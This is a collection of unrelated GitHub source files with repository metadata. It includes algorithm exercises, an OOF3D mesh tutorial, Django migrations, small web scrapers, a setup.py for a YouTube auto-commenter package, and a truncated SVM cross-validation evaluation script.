for j in range(adjacencyLength):
searchSpace.append(number[i + j])
if 0 in searchSpace:
continue
for k in range(len(searchSpace)):
product *= searchSpace[k]
if product > maxProduct:
maxProduct = product
print(maxProduct) | [
"noreply@github.com"
] | noreply@github.com |
ab3e2eb43508d9f342a4113bbe93ea6f50279af2 | 63255cf9da84b5dd6aa4454dd50385d50c43aac9 | /tencent/sort_and_search/search.py | 7ed8bafa2fc87c9642650340c00b88a538a669e8 | [
"MIT"
] | permissive | summer-vacation/AlgoExec | d37054e937b7e3cc4c0f76019cf996acb0fb5a34 | 55c6c3e7890b596b709b50cafa415b9594c03edd | refs/heads/master | 2021-07-09T12:18:51.532581 | 2020-12-20T13:46:43 | 2020-12-20T13:46:43 | 223,929,183 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,429 | py | # -*- coding: utf-8 -*-
"""
File Name: search
Author : jing
Date: 2020/3/19
https://leetcode-cn.com/explore/interview/card/tencent/224/sort-and-search/927/
搜索旋转排序数组
O(log n)
"""
class Solution:
def search(self, nums, target: int) -> int:
if nums is None or len(nums) == 0:
return -1
if target in nums:
index = nums.index(target)
return index
else:
return -1
# 二分搜索
def search2(self, nums, target: int) -> int:
if not nums:
return -1
if len(nums) == 1:
return 0 if nums[0] == target else -1
cent = len(nums) // 2
if target < nums[cent] <= nums[-1]:
return self.search(nums[:cent], target)
elif target >= nums[cent] >= nums[0]:
res = self.search(nums[cent:], target)
if res == -1:
return -1
else:
return cent + res
else:
resl = self.search(nums[:cent], target)
resr = self.search(nums[cent:], target)
if resr != -1:
return cent + resr
if resl != -1:
return resl
return -1
if __name__ == '__main__':
print(Solution().search([4,5,6,7,0,1,2], 3))
| [
"280806137@qq.com"
] | 280806137@qq.com |
385a5bafa117ea93e64ca3733a3337a00c47b93e | d24cef73100a0c5d5c275fd0f92493f86d113c62 | /SRC/tutorials/adaptive.py | a1b03746e2aa8e81ec7c3f1153c3136a05f080a9 | [
"LicenseRef-scancode-warranty-disclaimer"
] | no_license | rlinder1/oof3d | 813e2a8acfc89e67c3cf8fdb6af6b2b983b8b8ee | 1fb6764d9d61126bd8ad4025a2ce7487225d736e | refs/heads/master | 2021-01-23T00:40:34.642449 | 2016-09-15T20:51:19 | 2016-09-15T20:51:19 | 92,832,740 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,624 | py | # -*- python -*-
# $RCSfile: adaptive.py,v $
# $Revision: 1.14.2.6 $
# $Author: langer $
# $Date: 2014/09/27 22:34:44 $
# This software was produced by NIST, an agency of the U.S. government,
# and by statute is not subject to copyright in the United States.
# Recipients of this software assume all responsibilities associated
# with its operation, modification and maintenance. However, to
# facilitate maintenance we ask that before distributing modified
# versions of this software, you first contact the authors at
# oof_manager@nist.gov.
from ooflib.tutorials import tutorial
TutoringItem = tutorial.TutoringItem
TutorialClass = tutorial.TutorialClass
## TODO 3.1: Rewrite this so that it uses the Refine SkeletonModifier
## instead of the AMR MeshModifier. Then re-record the GUI test for
## this tutorial.
TutorialClass(
subject = "Adaptive Mesh Refinement",
ordering = 6,
lessons = [
TutoringItem(
subject="Introduction",
comments=
"""OOF3D provides a rudimentary adaptive mesh refinement tool via
BOLD(a Posteriori) error estimation scheme that utilizes
BOLD(Superconvergent Patch Recovery) of BOLD(Zienkiewicz) and
BOLD(Zhu) -- more discussion of the subject can be found in the
OOF3D manual.
In this tutorial, the adaptive mesh refinement will be briefly
demonstrated.
BOLD(NOTE:) In version 3.0 of OOF3D, adaptive mesh refinement
only works on the default Subproblem of a Mesh. Fields and
Equations defined on other Subproblems will not be seen by the
adaptive mesh machinery.
"""),
TutoringItem(
subject="Loading a Skeleton",
comments=
"""Open a graphics window, if none has been opened yet, with
the BOLD(Graphics/New) command in the BOLD(Windows) menu.
Download the file BOLD(el_shape.mesh) from
http://www.ctcms.nist.gov/oof/oof3d/examples, or locate it within the
share/oof3d/examples directory in your OOF3D installation.
A data file can be loaded from the BOLD(File) menu in the main OOF3D
window (BOLD(File -> Load -> Data)).
Select the example file (BOLD(el_shape.mesh)) in the file selector,
and click BOLD(OK).
""",
signal = ("new who", "Skeleton")
),
TutoringItem(
subject="L-shaped Domain",
comments=
"""If you have finished the tutorial for BOLD(Non-rectangular Domain),
you should be familiar with this Mesh.
The Mesh looks rectangular but Material has been assigned only to
the BOLD(green) part of the Mesh, which simulates an effective
BOLD(L)-shaped domain.
Move on to the next slide.
""" ),
TutoringItem(
subject="Boundary Conditions",
comments="""The Mesh is ready to be solved.
The applied boundary conditions (all BOLD(Dirichlet)) are:
BOLD(1.) u_x = 0 on the BOLD(Xmin) side
BOLD(2.) u_y = 0 on the BOLD(Xmin) side
BOLD(3.) u_z = 0 on the BOLD(Xmin) side
BOLD(4.) u_x = 0 on the BOLD(Ymax) side
BOLD(5.) u_y = 0 on the BOLD(Ymax) side
BOLD(6.) u_z = 0 on the BOLD(Ymax) side
BOLD(7.) u_y = -2 on the BOLD(Xmax) side
BOLD(8.) u_z = -2 on the BOLD(Xmax) side"""
),
# TODO 3.0: Minor schizophrenia -- since the introduction of
# subproblems, the "Solve" menu item sends "subproblem changed"
# and not "mesh changed", but the adaptive mesh refinement routine
# itself sends "mesh changed".
TutoringItem(
subject="Solution",
comments=
"""Open the BOLD(Solver) page and just click BOLD(Solve).
A deformed Mesh will be displayed in the graphics window.
Note that dummy elements (BOLD(ivory) part) are BOLD(NOT) displayed
in the deformed Mesh.
For the clearer view, let us hide the Skeleton layer.
Navigate to the bottom of the graphics window and find a layer
labeled BOLD(Skeleton(skeleton)) and Uncheck the square box to
hide the layer.
Due to the shape of the domain, it is obvious that stresses are
highly concentrated in the region surrounding the corner.
It is also safe to assume that errors in this region would be higher
than in other regions.
Move on to the next slide to start the process for adaptive mesh
refinement.
""",
signal = "subproblem changed"
),
# TODO: *** Mesh Status for el_shape:skeleton:mesh ***
# Unsolvable: Subproblem 'default' is ill-posed!
# Equation 'Force_Balance' has no flux contributions
TutoringItem(
subject="Adaptive Mesh Refinement",
comments=
"""Go back to the BOLD(FEMesh) page.
Select BOLD(Adaptive Mesh Refinement).
As of now, we have only one error estimator, BOLD(Z-Z Estimator).
Select BOLD(L2 Error Norm) for error estimating BOLD(method).
Select BOLD(stress), which is the only entity,
for the BOLD(flux) parameter.
Set BOLD(threshold) to be BOLD(10).
For each element, an L2 error norm will be computed
with stresses computed from the finite element solution and their
recovered counterparts, which act as exact stresses.
If the relative error exceeds 10 percent, the element will be refined.
The next three parameters, BOLD(criterion), BOLD(degree) and, BOLD(alpha)
take care of actual refinement. Don't bother with these parameters
for this tutorial (See BOLD(skeleton) tutorial for details).
Sometimes, refinement could create badly-shaped elements. These elements
can be removed by turning on the BOLD(rationalize) option.
By default, field values are transferred to the refined mesh.
This, however, is just a
projection of the previous solution onto the refined mesh --
you need to re-solve the problem for improved solution.
Leave these options as they are for now and click BOLD(OK).
""",
signal = "mesh changed"
),
TutoringItem(
subject="Refined Mesh",
comments=
"""As expected, elements surrounding the corner have been refined.
Now, go to the BOLD(Solver) page.
BOLD(Solve) the problem again with the refined mesh.
""",
signal = "subproblem changed"
),
TutoringItem(
subject="Refine Again",
comments=
"""
Go back to the BOLD(FEMesh) page and refine the mesh again
(just click BOLD(OK)).
The corner has been refined more. For a better view, use
BOLD(ctrl)+BOLD(.) or BOLD(Settings)->BOLD(Zoom)->BOLD(In) from
the graphics window.
This process (BOLD(Refine) + BOLD(Solve)) can be repeated, until
you're satisfied.
Thanks for trying out the tutorial.
""",
signal = "mesh changed"
)
])
| [
"faical.congo@nist.gov"
] | faical.congo@nist.gov |
ed8fef3d07e23a2f093517f597f0c74a78ebe285 | 405f30b4c99bbfcbdafeb66117650ec74d9e72a8 | /efarma/migrations/0012_auto_20210915_0047.py | 323a604d7b5f9f2e20cdbf6ce2d9369c1e7f521d | [] | no_license | kiri-kkv/Farma-e-commerce | 40fd12d49a43aedfc8bfdf31e7004205b08380fc | 02cce3963e1a643cb17d8ffe0ae2e7d662ff66c9 | refs/heads/main | 2023-08-13T17:01:29.990848 | 2021-10-03T19:37:09 | 2021-10-03T19:37:09 | 412,755,943 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 334 | py | # Generated by Django 3.1.7 on 2021-09-14 19:17
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('efarma', '0011_auto_20210915_0023'),
]
operations = [
migrations.RenameModel(
old_name='Productss',
new_name='Products',
),
]
| [
"abhayrajpurohit457@gmail.com"
] | abhayrajpurohit457@gmail.com |
10f5428c568f19809af1bd1c84c1055637190d5f | 1a045ef85f066935912c937e4fdf331bad135746 | /learn.py | 45947697dd6c5673382ee68c68034331eb265f80 | [] | no_license | hlpureboy/EduSpider | 154c716152a8150fac70a5ddc1e45038bde15543 | f715ec8d6f364b3ee4cfe3d28d4d4386818490e2 | refs/heads/master | 2021-01-18T17:31:22.502743 | 2017-09-11T14:38:24 | 2017-09-11T14:38:24 | 100,488,683 | 3 | 1 | null | null | null | null | UTF-8 | Python | false | false | 816 | py | # -*- coding: utf-8 -*-
import requests
from bs4 import BeautifulSoup
import sys
reload(sys)
sys.setdefaultencoding('utf8')
url='https://src.edu-info.edu.cn/list/?page='
def getinfo(url):
r = requests.get(url)
html_soup = BeautifulSoup(r.content, 'html.parser', from_encoding='utf8')
tr_soup = html_soup.find_all('tr', attrs={'class': 'row'})
for r in tr_soup:
r = str(r)
r_soup = BeautifulSoup(r, 'html.parser')
td = r_soup.find_all('td')
print td[0].text.strip(), td[1].text.strip(), td[2].text.strip(), td[3].text.strip()
f=open('D:/Buginfo.txt','a')
f.write(td[0].text.strip()+'||'+td[1].text.strip()+'||'+td[2].text.strip()+'||'+td[3].text.strip())
f.write('\n')
f.close()
for i in range(1,582):
Url=url+str(i)
getinfo(Url) | [
"hlpureboy@163.com"
] | hlpureboy@163.com |
667bf15c9e1a2c043f86acfeab69ef01a6f1287e | 52272d2b5bebf8b6d63bd7d3283744c6993fe6b9 | /Experiment 8 GS.py | e55f1ad2226961be6eab989b5baf303e1b85e119 | [] | no_license | Saqib9828/Numerical-Methods | 54143c376b851096c88e26cf38d05a0652d3f24b | 33563d294cc668fac5c12cb1d9a964417824bbb1 | refs/heads/master | 2020-07-15T01:37:17.891376 | 2019-11-12T11:26:56 | 2019-11-12T11:26:56 | 205,449,495 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 467 | py | import numpy as np
A = np.array([[4, -1, 1], [-1, 4, -2], [1, -2, 4]])
B = np.array([12, -1, 5])
x1= 0.0;x2 =0.0;x3 = 0.0;
count=0
while True:
w = x1; y= x2; z = x3;
x1 = float((B[0]-A[0][1]*x2-A[0][2]*x3)/A[0][0])
x2 = float((B[1]-A[1][0]*x1-A[1][2]*x3)/A[1][1])
x3 = float((B[2]-A[2][0]*x1-A[2][1]*x2)/A[2][2])
if(abs(w-x1)<0.1 and abs(y-x2)<0.1 and abs(z-x3)<0.1):
print('Answers: {:0.3f},{:0.3f},{:0.3f}'.format(x1,x2,x3))
break
| [
"noreply@github.com"
] | noreply@github.com |
2ad5fa16421f87f656519643af8a3217cfecc11c | 15f321878face2af9317363c5f6de1e5ddd9b749 | /solutions_python/Problem_145/223.py | c67f0e3c81cc4903f6cdce8da4043c6407e2bad7 | [] | no_license | dr-dos-ok/Code_Jam_Webscraper | c06fd59870842664cd79c41eb460a09553e1c80a | 26a35bf114a3aa30fc4c677ef069d95f41665cc0 | refs/heads/master | 2020-04-06T08:17:40.938460 | 2018-10-14T10:12:47 | 2018-10-14T10:12:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 668 | py | #!/usr/bin/env pypy
# -*- coding: utf-8 -*-
# google code jam - c.durr - 2014
# Part Elf
# https://code.google.com/codejam/contest/3004486/dashboard
#
#
from math import *
from sys import *
from fractions import *
def readint(): return int(stdin.readline())
def readarray(f): return map(f, stdin.readline().split())
def readstring(): return stdin.readline().strip()
def solve(f):
k = -1
for g in range(40):
f *= 2
if f>=1:
f-=1
if k==-1:
k = g+1
if f==0:
return k
else:
return -1
for test in range(readint()):
f = readarray(Fraction)[0]
g = solve(f)
print "Case #%i:"% (test+1), ("impossible" if g==-1 else g)
| [
"miliar1732@gmail.com"
] | miliar1732@gmail.com |
8049fed35e9b91609422ac82c0339c6f80a7b202 | 1bbe6628b8700c04082efe3f7845fa2d224f69f8 | /kraft/config/__init__.py | 487250975ddf54c83c9424d4c47454981715a99c | [
"BSD-3-Clause"
] | permissive | shawndfisher/kraft | 59d602d8ce342e1d6130101c4cd1a3825acc59be | ef604ff736c68f724283c61975052c0e9a6ac50f | refs/heads/master | 2022-07-14T06:55:40.035956 | 2020-05-13T06:04:50 | 2020-05-13T06:04:50 | 263,535,484 | 0 | 0 | NOASSERTION | 2020-05-13T05:38:41 | 2020-05-13T05:38:40 | null | UTF-8 | Python | false | false | 1,769 | py | # SPDX-License-Identifier: BSD-3-Clause
#
# Authors: Alexander Jung <alexander.jung@neclab.eu>
#
# Copyright (c) 2020, NEC Europe Ltd., NEC Corporation. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# 3. Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
from __future__ import absolute_import
from __future__ import unicode_literals
from . import environment | [
"a.jung@lancs.ac.uk"
] | a.jung@lancs.ac.uk |
3e3334ac9c457a09d67255034637563218b4b84c | 78d8bc8f5ab999d1ba57ff0170ad961aef79cdd1 | /TutorialsPy/tute11EX.py | a32fb2d5be80ee5d7a44f1a4a3747de5e24b2656 | [] | no_license | KrushnaDike/My-Python-Practice | 239197b198f8ba1ec1951bcf6c91cbe7f116eebd | c7bfa8aec5ab1f5760ec8fb5c9c5321aaf263366 | refs/heads/main | 2023-07-05T15:18:47.402772 | 2021-08-13T17:41:06 | 2021-08-13T17:41:06 | 395,737,118 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 254 | py | dict1 = {"Mutable":"Can Change", "Immutable":"Can Not Change",
"Set":"It is the collection of well defined object", "Software":"Application"}
key = input("Enter what you want to search in oxford dictionary :")
print("Your Ans :",dict1[key])
| [
"noreply@github.com"
] | noreply@github.com |
7feb3a2099c0b31eb644b97094ca8bd35a6ed74b | 7af363055dda3aaa15babe62c44091a4850f1996 | /setup.py | ac9d89e6e576c60b7afb9081c7f7cbef0a469489 | [] | no_license | TH3-MA3STRO/youtube-auto-commenter | 801a537048e4c693809abc895b0088ff10955d7a | cff2c970642e327304f780a848c854a07a908e93 | refs/heads/master | 2022-07-15T14:39:17.592728 | 2020-05-12T16:57:52 | 2020-05-12T16:57:52 | 263,416,321 | 0 | 0 | null | 2020-05-12T18:18:29 | 2020-05-12T18:18:29 | null | UTF-8 | Python | false | false | 581 | py | import setuptools
setuptools.setup(
name="comspam",
version="1.0.0",
author="Abhi Raj", py_modules=['youtube-auto-commenter'],
install_requires=[
"pyautogui",
],
classifiers=[
"Natural Language :: English",
"Programming Language :: Python :: 3 :: Only",
"License :: GPL-3.0-or-later",
"Operating System :: OS Independent",
],
entry_points='''
[console_scripts]
comspam=youtube-auto-commenter:mainmenu
''',
python_requires='>=3.8',
include_package_data=True,
) | [
"noreply@github.com"
] | noreply@github.com |
9fe756e237503628f7a1484ed96bfbbd7a55d300 | 1eeb96daa88f5114ca6302d4182102f77d2c3447 | /objective.py | 89f49761efd1852169b01eee077f9913df2620b6 | [] | no_license | Shivam-walia/spyproject2 | d5271c0dca933296dc912990800f0eae177cd3bc | 13f98e9bb3a0af8fa1e58501c5a8be8611132dd3 | refs/heads/master | 2020-12-02T21:16:15.709776 | 2017-07-13T07:13:51 | 2017-07-13T07:13:51 | 96,283,978 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 761 | py | #import all need labraries and functions from files
from constants import *
import requests
from get_user_id import get_user_id
#function which fetch the hash tag comment from users post
def get_hash_tag(insta_username):
user_id=get_user_id(insta_username)
if user_id==None:
print "user not exist"
exit()
url=BASE_URL+'users/%s/media/recent/?access_token=%s' %(user_id,APP_ACCESS_TOKEN)
print "GET requested url :%s" %url
req_media=requests.get(url).json()
#open a text file
file=open("caption.txt",'w')
for posts in req_media['data']:
#file will be writtn
file.write(posts['caption']['text'].encode('utf-8'))
#close the file
file.close()
#call the fuction
get_hash_tag("rahul_r2557")
| [
"shivamw65@gmail.com"
] | shivamw65@gmail.com |
203d48135e76577a770ff4923a90e54c1bec9816 | bdfa01948ea90e324865c65b85634a9f66554c2d | /Módulo 1/EX_052.py | 41c4b08ba9433e3f610d0cf9365723414768e862 | [] | no_license | dev-dougie/curso_em_video-python | 4352dc93311fb2ce6618641ec45e0d813d6d6018 | c4e0af6b13897f631bb970b8e4da5ce6b905621b | refs/heads/master | 2022-11-19T05:51:53.619999 | 2020-07-23T21:46:44 | 2020-07-23T21:46:44 | 282,061,899 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 328 | py | p = str(input('Digite a palavra ou frase: ')).strip().upper()
frase = p.split()
junto = ''.join(frase)
inverso = ''
for c in range(len(junto) - 1, -1, -1): #lendo a quantidade de letras em 'junto' - 1
inverso = inverso + junto[c]
if inverso == junto:
print('É um políndromo')
else:
print('Não é um políndromo')
| [
"dougllasp.s@outlook.com"
] | dougllasp.s@outlook.com |
7cba99aca08bf67bf9a2ab23691abd5757786132 | 3582962421cdcdcf887eb1e74369bb62b3d2e22f | /Venv/bin/player.py | 7917d4a315e3020044f83a2d774bf3156a3454bb | [] | no_license | NickConnelly/NewTort | 5d9b5ebd45961b74315fb9bebe02f78835d1d531 | 7d84203b573e7a764e0a887d4a508f40976ae07d | refs/heads/master | 2020-04-02T03:25:44.047807 | 2016-07-22T02:42:18 | 2016-07-22T02:42:18 | 63,916,990 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,209 | py | #!/home/nick/Desktop/Tortoisewag742016/Venv/bin/python
#
# The Python Imaging Library
# $Id$
#
from __future__ import print_function
try:
from tkinter import *
except ImportError:
from Tkinter import *
from PIL import Image, ImageTk
import sys
# --------------------------------------------------------------------
# an image animation player
class UI(Label):
def __init__(self, master, im):
if isinstance(im, list):
# list of images
self.im = im[1:]
im = self.im[0]
else:
# sequence
self.im = im
if im.mode == "1":
self.image = ImageTk.BitmapImage(im, foreground="white")
else:
self.image = ImageTk.PhotoImage(im)
Label.__init__(self, master, image=self.image, bg="black", bd=0)
self.update()
try:
duration = im.info["duration"]
except KeyError:
duration = 100
self.after(duration, self.next)
def next(self):
if isinstance(self.im, list):
try:
im = self.im[0]
del self.im[0]
self.image.paste(im)
except IndexError:
return # end of list
else:
try:
im = self.im
im.seek(im.tell() + 1)
self.image.paste(im)
except EOFError:
return # end of file
try:
duration = im.info["duration"]
except KeyError:
duration = 100
self.after(duration, self.next)
self.update_idletasks()
# --------------------------------------------------------------------
# script interface
if __name__ == "__main__":
if not sys.argv[1:]:
print("Syntax: python player.py imagefile(s)")
sys.exit(1)
filename = sys.argv[1]
root = Tk()
root.title(filename)
if len(sys.argv) > 2:
# list of images
print("loading...")
im = []
for filename in sys.argv[1:]:
im.append(Image.open(filename))
else:
# sequence
im = Image.open(filename)
UI(root, im).pack()
root.mainloop()
| [
"nick.connelly@live.com"
] | nick.connelly@live.com |
2cb8ca949fcf8d9c0a0769f1582b3ef182b43004 | bed31e66a8a94a936afb61bd60b98ab5785a7e99 | /redditfunction.py | 80d42d381e407bd934ebb4b7599de6c0346bb045 | [] | no_license | MuskanSinghal/AnalyzingTrends | 6d0c9a08657c6540452f27c71f8de6e0317dc49e | 3aaa147eb35fcbb3daec1de87a056f051675518e | refs/heads/master | 2022-10-08T19:52:50.203070 | 2020-06-08T19:47:15 | 2020-06-08T19:47:15 | 270,776,371 | 0 | 0 | null | 2020-06-08T18:15:47 | 2020-06-08T18:15:47 | null | UTF-8 | Python | false | false | 709 | py | # -*- coding: utf-8 -*-
import requests
import json
class RedditFunction :
#This function returns a list of reddit post links
def getPushshiftData(self, size, after, before, queryr) :
args = '&sort=desc&sort_type=score&over_18=false&score=>2000&size=' +str(size) + '&after=' + str(after) + '&before=' +str(before) + '&q=' + str(queryr)
url = 'https://api.pushshift.io/reddit/search/submission/?' +str(args)
print(url)
r=requests.get(url)
data = json.loads(r.text)
fulllinks = []
for post in data['data'] :
fulllinks.append(post['full_link'])
return fulllinks
| [
"claytonmgravatt@gmail.com"
] | claytonmgravatt@gmail.com |
bdc2a4945556fd632e26d71c5acfeb2aaa531578 | f5785fb207619246463396b0ea51406e165ac7fd | /Week_01/42.接雨水.py | 40b3b63bcaed27d4756e5d78d6e4f943253868ff | [] | no_license | loveyinghua1987/algorithm014-algorithm014 | a6a1193145b876c25b2ca9b510c75055219f1d39 | 2f739162fa8f55aca5861b55eba67f430eedb5a6 | refs/heads/master | 2023-01-02T10:52:34.099502 | 2020-10-31T03:09:11 | 2020-10-31T03:09:11 | 286,626,769 | 0 | 0 | null | 2020-08-11T02:33:07 | 2020-08-11T02:33:07 | null | UTF-8 | Python | false | false | 1,325 | py | #
# @lc app=leetcode.cn id=42 lang=python3
#
# [42] 接雨水
#
# @lc code=start
class Solution:
def trap(self, height: List[int]) -> int:
#方法2:双指针
i, j = 0, len(height)-1
max_left, max_right = 0, 0
water = 0
while i < j:
if height[i] < height[j]: #height[i] < height[j] <= max_right
if height[i] >= max_left: # max_left <= height[i] < height[j] <= max_right
max_left = height[i]
else: #height[i] < max_left
water += max_left - height[i]
i += 1
else:# height[i] >= height[j]
if height[j] >= max_right:#max_left >= height[i] >= height[j] >= max_right
max_right = height[j]
else:
water +=max_right - height[j]
j -= 1
return water
'''
#方法1:栈
stack = []
water = 0
for i in range(len(height)):
while stack and height[i] > height[stack[-1]]:
j = stack.pop()
if not stack:
continue
water +=( min(height[stack[-1]], height[i]) - height[j])*(i - stack[-1]-1)
stack.append(i)
return water
'''
# @lc code=end
| [
"chendandanens@126.com"
] | chendandanens@126.com |
96ca952f04e3772a34cf8f1397fd20610d15c7a0 | 40caa23ac77a06d3062071363bc0d0332aeeeeb0 | /main/migrations/0002_game_status.py | dac473fa3fe04db8772b13f2e2c130ceacfe973e | [] | no_license | BasketballData/BasketballDataScrape | 5fac683f43c52ccab15d6276e880a114fd5ee00f | 39f7d1aab9f59ba72626387b7eea4029ec2cf8f3 | refs/heads/master | 2021-07-13T13:01:27.908214 | 2017-10-13T19:00:23 | 2017-10-13T19:00:23 | 103,017,164 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 486 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.5 on 2017-09-09 12:41
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('main', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='game',
name='status',
field=models.CharField(default='live', max_length=300),
preserve_default=False,
),
]
| [
"netcrime4@gmail.com"
] | netcrime4@gmail.com |
7df9946881c39fa19927dc7af9adc718209f4830 | b491cdde72d8d4beaa07ac9ca969dfe865856314 | /minimalpipeline-master/scripts/ev_cv.py | c4aff95664b2c9fb004e9967118f56499f7b756a | [] | no_license | FellinRoberto/PersonalityPrediction | 659a2c4cc94778f57b2da86991ec8dab971e74c1 | 0750b78f67c7693cfcae17024e3506e2d0f644fb | refs/heads/master | 2021-01-01T18:16:57.249997 | 2017-11-10T15:40:07 | 2017-11-10T15:40:07 | 98,294,451 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,917 | py | from __future__ import division
import os
import sys
import logging
from optparse import OptionParser
import metrics
from ev import read_res_pred_files
import math
logging.basicConfig(format='%(asctime)s : %(levelname)s : %(message)s', level=logging.INFO)
def stats_cv(path=".", format="trec", prefix="svm", th=50, verbose=False):
mrrs_se = []
mrrs_svm = []
abs_mrrs = []
rel_mrrs = []
maps_se = []
maps_svm = []
abs_maps = []
rel_maps = []
recalls1_se = []
recalls1_svm = []
abs_recalls = []
rel_recalls = []
oracle_mrrs = []
oracle_maps = []
oracle_recs1 = []
num_folds = 0
print "%13s %5s %7s %7s" %("IR", "SVM", "(abs)", "(rel)")
for fold in sorted(os.listdir(path)):
currentFold = os.path.join(path, fold)
if not os.path.isdir(currentFold):
continue
if not fold.startswith("fold"):
logging.warn("Directories containing CV folds should start with 'fold'")
continue
print fold
# Relevancy file
res_fname = os.path.join(currentFold, "%s.test.res" % prefix)
if not os.path.exists(res_fname):
logging.error("Relevancy file not found: %s", res_fname)
sys.exit(1)
# Predictions file
pred_fname = os.path.join(currentFold, "%s.pred" % prefix)
if not os.path.exists(pred_fname):
logging.error("SVM prediction file not found: %s", pred_fname)
sys.exit(1)
try:
ir, svm = read_res_pred_files(res_fname, pred_fname, format, verbose)
except:
logging.error("Failed to process input files: %s %s", res_fname, pred_fname)
logging.error("Check that the input file format is correct")
sys.exit(1)
# MRR
mrr_se = metrics.mrr(ir, th)
mrr_svm = metrics.mrr(svm, th)
mrrs_se.append(mrr_se)
mrrs_svm.append(mrr_svm)
# improvement
abs_mrr_diff = mrr_svm - mrr_se
rel_mrr_diff = (mrr_svm - mrr_se)*100/mrr_se
abs_mrrs.append(abs_mrr_diff)
rel_mrrs.append(rel_mrr_diff)
print "MRR: %5.2f %5.2f %+6.2f%% %+6.2f%%" % (mrr_se, mrr_svm, abs_mrr_diff, rel_mrr_diff)
# MAP
map_se = metrics.map(ir)
map_svm = metrics.map(svm)
maps_se.append(map_se)
maps_svm.append(map_svm)
# improvement
abs_map_diff = map_svm - map_se
rel_map_diff = (map_svm - map_se)*100/map_se
abs_maps.append(abs_map_diff)
rel_maps.append(rel_map_diff)
print "MAP: %5.2f %5.2f %+6.2f%% %+6.2f%%" % (map_se, map_svm, abs_map_diff, rel_map_diff)
# Recall-of-1@1
rec_se = metrics.recall_of_1(ir, th)[0]
rec_svm = metrics.recall_of_1(svm, th)[0]
recalls1_se.append(rec_se)
recalls1_svm.append(rec_svm)
# improvement
abs_rec_diff = rec_svm - rec_se
rel_rec_diff = (rec_svm - rec_se)*100/rec_se
abs_recalls.append(abs_rec_diff)
rel_recalls.append(rel_rec_diff)
print "P@1: %5.2f %5.2f %+6.2f%% %+6.2f%%" % (rec_se, rec_svm, abs_rec_diff, rel_rec_diff)
num_folds += 1
'''
mrr_oracle = metrics.oracle_mrr(ir, th)
map_oracle = metrics.oracle_map(ir)
prec_oracle = metrics.oracle_precision(ir, th)[0]
rec1_oracle = metrics.oracle_recall_of_1(ir, th)[0]
oracle_mrrs.append(mrr_oracle)
oracle_maps.append(map_oracle)
oracle_recs1.append(rec1_oracle)
print "Oracle MRR: %5.2f, Oracle MAP: %5.2f, Oracle prec: %5.2f, Oracle rec@1: %5.2f" % (mrr_oracle, map_oracle, prec_oracle, rec1_oracle)
'''
# mrrs
avg_mrr_se, std_mrr_se = mean_and_std(mrrs_se)
avg_mrr_svm, std_mrr_svm = mean_and_std(mrrs_svm)
avg_abs_impr_mrr, std_abs_impr_mrr = mean_and_std(abs_mrrs)
avg_rel_impr_mrr, std_rel_impr_mrr = mean_and_std(rel_mrrs)
#oracle_avg_mrr, std_oracle_avg_mrr = mean_and_std(oracle_mrrs)
# maps
avg_map_se, std_map_se = mean_and_std(maps_se)
avg_map_svm, std_map_svm = mean_and_std(maps_svm)
avg_abs_impr_map, std_abs_impr_map = mean_and_std(abs_maps)
avg_rel_impr_map, std_rel_impr_map = mean_and_std(rel_maps)
#oracle_avg_map, std_oracle_avg_map = mean_and_std(oracle_maps)
# recall
avg_rec1_se, std_rec1_se = mean_and_std(recalls1_se) # se
avg_rec1_svm, std_rec1_svm = mean_and_std(recalls1_svm) # svm
avg_abs_impr_rec1, std_abs_impr_rec1 = mean_and_std(abs_recalls) # absolute
avg_rel_impr_rec1, std_rel_impr_rec1 = mean_and_std(rel_recalls) # relative
#oracle_avg_rec1, std_oracle_avg_rec1 = mean_and_std(oracle_recs1)
FMT = u"%3s: %5.2f \u00B1 %4.2f %5.2f \u00B1 %4.2f %+6.2f%% \u00B1 %4.2f %+6.2f%% \u00B1 %4.2f"
#ORACLE_FMT = u"Oracle MRR: %5.2f \u00B1 %4.2f, Oracle MAP: %5.2f \u00B1 %4.2f, Oracle P@1: %5.2f \u00B1 %4.2f"
print
print "Averaged over %s folds" % num_folds
print "%17s %12s %14s %14s" %("IR", "SVM", "(abs)", "(rel)")
